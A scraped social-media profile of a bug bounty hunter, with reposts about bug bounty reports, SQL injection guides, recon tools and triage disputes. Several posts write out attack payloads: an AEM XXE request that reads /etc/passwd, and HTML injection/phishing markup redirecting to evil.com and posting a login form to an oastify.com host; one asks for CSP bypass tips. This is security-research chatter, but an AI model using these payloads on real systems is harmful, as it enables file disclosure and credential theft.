@Czeppo1 Profile picture

Czeppo

@Czeppo1

Joined October 2020
Similar User
Febin photo

@febin_0x1

B19R8A14 photo

@B19R8A14

Adib Dzulfikar photo

@adib_dz

Fx4Head1996 photo

@morshedula614

Cihan Özcan photo

@cihanozcan_tr

cyborg photo

@LULZ74049089

andutu photo

@anduturacila

Krish photo

@Krish21634105

When How @ “Grounded A.I.” photo

@hothoehot

Sh3lld0r photo

@Sh3lld0r

c0rvu5 photo

@0xc0rvu5

M Baka photo

@MBaka97926718

⚡d4rk⚡ photo

@hassko_elhadi

Wendy  photo

@smellycat000

Suwitcha Musijaral photo

@suwitcham

Czeppo Reposted

AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity

Tweet Image 1

Just got a reward for a high vulnerability submitted on @yeswehack -- Insecure Direct Object Reference (IDOR) (CWE-639). #YesWeRHackers

Tweet Image 1

No words after 6 months report

Tweet Image 1

My report (ATO) is closed as RTSF because there is a previous report that filed the same error and was closed as RTSF. However the new scope has just been added and I am the first to report. I think my report is valid and the previous report is out of scope. Help me @yeswehack


Czeppo Reposted

🚨 Keeping debug mode enabled can expose sensitive info in the web app's stack trace like database credentials, file paths, and more. I have made a list of few common errors that can be searched through Google Dorking using error title. #WebSecurity #BugBounty #CyberSecurity

Tweet Image 1
Tweet Image 2

Czeppo Reposted

I just Published - A Comprehensive Guide to Manually Hunting SQL Injection in MSSQL, MySQL, Oracle, and NoSQL (MongoDB) - nav1n0x.gitbook.io/a-guide-to-man… I tried to explain everything I could. Let me know your opinion and suggestions, if any. I will keep updating the article whenever I…

Tweet Image 1

Czeppo Reposted

I've made my Advanced SQL Injection Techniques repo on GitHub public. Head over to my repo and take a look. I hope you like it. #BugBounty #SQLInjection. github.com/ifconfig-me/SQ…


I just received an email from a somewhat strange address. Really surprising. Is it real or fake? #yeswehack

Tweet Image 1

Meaningless 🤣🤣🤣

Tweet Image 1

Czeppo Reposted

Effective way to crawl juicy endpoints with Katana 😎🤏🏻 happy hunting :)

Tweet Image 1

Any tips bypass CSP Content-Security-Policy: default-src 'self';img-src 'self';style-src 'self';font-src 'self';connect-src 'self';script-src 'self';form-action 'self' test.com testxyz.com ;frame-ancestors 'self'; #bugbounty

Tweet Image 1

Czeppo Reposted

I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets! Very Very useful on Large targets github.com/blacklanternse… #BugBounty #bugbountytips #infosec

Tweet Image 1

Czeppo Reposted

Coffnxp payloads ;) <A HREF="evil.com">Login Here </A> <script>document.location.href="evil.com"</script> <h3>Please login to proceed</h3> <form action=…8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username"…

Tweet Image 1

In my report , i send a file to victim, victim open file --> csrf is exploited. Triager not accept this and comment as bellow --> so tired to explain and creat a link poc. In essence, these two ways are the same. This right ? #BugBounty

Tweet Image 1

Czeppo Reposted

OpenSource knowledge database of all the techniques to achieve Remote Code Execution (RCE) on various applications 👇 github.com/p0dalirius/Awe… #bugbountytips #BugBounty


I have achieved 1000 points on @yeswehack

Tweet Image 1

Loading...

Something went wrong.


Something went wrong.